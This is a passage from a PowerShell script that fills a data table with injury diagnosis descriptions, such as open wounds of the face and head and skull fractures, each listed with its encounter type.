area","Laceration with foreign body of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right eyelid and periocular area","Laceration with foreign body of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left eyelid and periocular area","Laceration with foreign body of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left eyelid and periocular area","Laceration with foreign body of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left eyelid and periocular area","Laceration with foreign body of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified eyelid and periocular area","Laceration with foreign body of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified eyelid and periocular area","Laceration with foreign body of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified eyelid and periocular area","Laceration with foreign body of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right eyelid and periocular area","Puncture wound without foreign body of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right eyelid and periocular area","Puncture wound without foreign body of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right eyelid and periocular area","Puncture wound without foreign body of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left eyelid and periocular area","Puncture wound without foreign body of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left eyelid and periocular area","Puncture wound without foreign body of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left eyelid and periocular area","Puncture wound without foreign body of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified eyelid and periocular area","Puncture wound without foreign body of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified eyelid and periocular area","Puncture wound without foreign body of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified eyelid and periocular area","Puncture wound without foreign body of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right eyelid and periocular area","Puncture wound with foreign body of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right eyelid and periocular area","Puncture wound with foreign body of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right eyelid and periocular area","Puncture wound with foreign body of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left eyelid and periocular area","Puncture wound with foreign body of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left eyelid and periocular area","Puncture wound with foreign body of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left eyelid and periocular area","Puncture wound with foreign body of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified eyelid and periocular area","Puncture wound with foreign body of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified eyelid and periocular area","Puncture wound with foreign body of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified eyelid and periocular area","Puncture wound with foreign body of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right eyelid and periocular area","Open bite of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right eyelid and periocular area","Open bite of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right eyelid and periocular area","Open bite of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left eyelid and periocular area","Open bite of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left eyelid and periocular area","Open bite of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left eyelid and periocular area","Open bite of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified eyelid and periocular area","Open bite of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified eyelid and periocular area","Open bite of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified eyelid and periocular area","Open bite of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of nose","Unspecified open wound of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of nose","Unspecified open wound of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of nose","Unspecified open wound of nose, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of nose","Laceration without foreign body of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of nose","Laceration without foreign body of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of nose","Laceration without foreign body of nose, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of nose","Laceration with foreign body of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of nose","Laceration with foreign body of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of nose","Laceration with foreign body of nose, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of nose","Puncture wound without foreign body of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of nose","Puncture wound without foreign body of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of nose","Puncture wound without foreign body of nose, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of nose","Puncture wound with foreign body of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of nose","Puncture wound with foreign body of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of nose","Puncture wound with foreign body of nose, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of nose","Open bite of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of nose","Open bite of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of nose","Open bite of nose, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ear","Unspecified open wound of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ear","Unspecified open wound of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ear","Unspecified open wound of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ear","Unspecified open wound of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ear","Unspecified open wound of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ear","Unspecified open wound of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified ear","Unspecified open wound of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified ear","Unspecified open wound of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified ear","Unspecified open wound of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ear","Laceration without foreign body of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ear","Laceration without foreign body of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ear","Laceration without foreign body of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ear","Laceration without foreign body of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ear","Laceration without foreign body of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ear","Laceration without foreign body of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified ear","Laceration without foreign body of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified ear","Laceration without foreign body of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified ear","Laceration without foreign body of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ear","Laceration with foreign body of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ear","Laceration with foreign body of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ear","Laceration with foreign body of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ear","Laceration with foreign body of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ear","Laceration with foreign body of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ear","Laceration with foreign body of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified ear","Laceration with foreign body of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified ear","Laceration with foreign body of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified ear","Laceration with foreign body of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ear","Puncture wound without foreign body of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ear","Puncture wound without foreign body of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ear","Puncture wound without foreign body of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ear","Puncture wound without foreign body of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ear","Puncture wound without foreign body of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ear","Puncture wound without foreign body of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified ear","Puncture wound without foreign body of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified ear","Puncture wound without foreign body of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified ear","Puncture wound without foreign body of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ear","Puncture wound with foreign body of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ear","Puncture wound with foreign body of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ear","Puncture wound with foreign body of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ear","Puncture wound with foreign body of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ear","Puncture wound with foreign body of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ear","Puncture wound with foreign body of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified ear","Puncture wound with foreign body of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified ear","Puncture wound with foreign body of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified ear","Puncture wound with foreign body of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right ear","Open bite of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right ear","Open bite of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right ear","Open bite of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left ear","Open bite of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left ear","Open bite of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left ear","Open bite of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified ear","Open bite of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified ear","Open bite of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified ear","Open bite of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right cheek and temporomandibular area","Unspecified open wound of right cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right cheek and temporomandibular area","Unspecified open wound of right cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right cheek and temporomandibular area","Unspecified open wound of right cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left cheek and temporomandibular area","Unspecified open wound of left cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left cheek and temporomandibular area","Unspecified open wound of left cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left cheek and temporomandibular area","Unspecified open wound of left cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified cheek and temporomandibular area","Unspecified open wound of unspecified cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified cheek and temporomandibular area","Unspecified open wound of unspecified cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified cheek and temporomandibular area","Unspecified open wound of unspecified cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right cheek and temporomandibular area","Laceration without foreign body of right cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right cheek and temporomandibular area","Laceration without foreign body of right cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right cheek and temporomandibular area","Laceration without foreign body of right cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left cheek and temporomandibular area","Laceration without foreign body of left cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left cheek and temporomandibular area","Laceration without foreign body of left cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left cheek and temporomandibular area","Laceration without foreign body of left cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified cheek and temporomandibular area","Laceration without foreign body of unspecified cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified cheek and temporomandibular area","Laceration without foreign body of unspecified cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified cheek and temporomandibular area","Laceration without foreign body of unspecified cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right cheek and temporomandibular area","Laceration with foreign body of right cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right cheek and temporomandibular area","Laceration with foreign body of right cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right cheek and temporomandibular area","Laceration with foreign body of right cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left cheek and temporomandibular area","Laceration with foreign body of left cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left cheek and temporomandibular area","Laceration with foreign body of left cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left cheek and temporomandibular area","Laceration with foreign body of left cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified cheek and temporomandibular area","Laceration with foreign body of unspecified cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified cheek and temporomandibular area","Laceration with foreign body of unspecified cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified cheek and temporomandibular area","Laceration with foreign body of unspecified cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right cheek and temporomandibular area","Puncture wound without foreign body of right cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right cheek and temporomandibular area","Puncture wound without foreign body of right cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right cheek and temporomandibular area","Puncture wound without foreign body of right cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left cheek and temporomandibular area","Puncture wound without foreign body of left cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left cheek and temporomandibular area","Puncture wound without foreign body of left cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left cheek and temporomandibular area","Puncture wound without foreign body of left cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified cheek and temporomandibular area","Puncture wound without foreign body of unspecified cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified cheek and temporomandibular area","Puncture wound without foreign body of unspecified cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified cheek and temporomandibular area","Puncture wound without foreign body of unspecified cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right cheek and temporomandibular area","Puncture wound with foreign body of right cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right cheek and temporomandibular area","Puncture wound with foreign body of right cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right cheek and temporomandibular area","Puncture wound with foreign body of right cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left cheek and temporomandibular area","Puncture wound with foreign body of left cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left cheek and temporomandibular area","Puncture wound with foreign body of left cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left cheek and temporomandibular area","Puncture wound with foreign body of left cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified cheek and temporomandibular area","Puncture wound with foreign body of unspecified cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified cheek and temporomandibular area","Puncture wound with foreign body of unspecified cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified cheek and temporomandibular area","Puncture wound with foreign body of unspecified cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right cheek and temporomandibular area","Open bite of right cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right cheek and temporomandibular area","Open bite of right cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right cheek and temporomandibular area","Open bite of right cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left cheek and temporomandibular area","Open bite of left cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left cheek and temporomandibular area","Open bite of left cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left cheek and temporomandibular area","Open bite of left cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified cheek and temporomandibular area","Open bite of unspecified cheek and temporomandibular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified cheek and temporomandibular area","Open bite of unspecified cheek and temporomandibular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified cheek and temporomandibular area","Open bite of unspecified cheek and temporomandibular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lip","Unspecified open wound of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lip","Unspecified open wound of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lip","Unspecified open wound of lip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of oral cavity","Unspecified open wound of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of oral cavity","Unspecified open wound of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of oral cavity","Unspecified open wound of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lip","Laceration without foreign body of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lip","Laceration without foreign body of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lip","Laceration without foreign body of lip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of oral cavity","Laceration without foreign body of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of oral cavity","Laceration without foreign body of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of oral cavity","Laceration without foreign body of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lip","Laceration with foreign body of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lip","Laceration with foreign body of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lip","Laceration with foreign body of lip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of oral cavity","Laceration with foreign body of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of oral cavity","Laceration with foreign body of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of oral cavity","Laceration with foreign body of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lip","Puncture wound without foreign body of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lip","Puncture wound without foreign body of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lip","Puncture wound without foreign body of lip, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of oral cavity","Puncture wound without foreign body of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of oral cavity","Puncture wound without foreign body of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of oral cavity","Puncture wound without foreign body of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lip","Puncture wound with foreign body of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lip","Puncture wound with foreign body of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lip","Puncture wound with foreign body of lip, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of oral cavity","Puncture wound with foreign body of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of oral cavity","Puncture wound with foreign body of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of oral cavity","Puncture wound with foreign body of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of lip","Open bite of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of lip","Open bite of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of lip","Open bite of lip, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of oral cavity","Open bite of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of oral cavity","Open bite of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of oral cavity","Open bite of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other part of head","Unspecified open wound of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other part of head","Unspecified open wound of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other part of head","Unspecified open wound of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other part of head","Laceration without foreign body of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other part of head","Laceration without foreign body of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other part of head","Laceration without foreign body of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other part of head","Laceration with foreign body of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other part of head","Laceration with foreign body of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other part of head","Laceration with foreign body of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other part of head","Puncture wound without foreign body of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other part of head","Puncture wound without foreign body of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other part of head","Puncture wound without foreign body of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other part of head","Puncture wound with foreign body of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other part of head","Puncture wound with foreign body of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other part of head","Puncture wound with foreign body of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of other part of head","Open bite of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of other part of head","Open bite of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of other part of head","Open bite of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of head","Unspecified open wound of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of head","Unspecified open wound of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of head","Unspecified open wound of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of head","Laceration without foreign body of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of head","Laceration without foreign body of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of head","Laceration without foreign body of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of head","Laceration with foreign body of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of head","Laceration with foreign body of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of head","Laceration with foreign body of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of head","Puncture wound without foreign body of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of head","Puncture wound without foreign body of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of head","Puncture wound without foreign body of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of head","Puncture wound with foreign body of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of head","Puncture wound with foreign body of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of head","Puncture wound with foreign body of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of head","Open bite of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of head","Open bite of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of head","Open bite of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of vault of skull","Fracture of vault of skull, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of vault of skull","Fracture of vault of skull, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of vault of skull","Fracture of vault of skull, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of vault of skull","Fracture of vault of skull, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of vault of skull","Fracture of vault of skull, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of vault of skull","Fracture of vault of skull, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, right side","Fracture of base of skull, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, right side","Fracture of base of skull, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, right side","Fracture of base of skull, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, right side","Fracture of base of skull, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, right side","Fracture of base of skull, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, right side","Fracture of base of 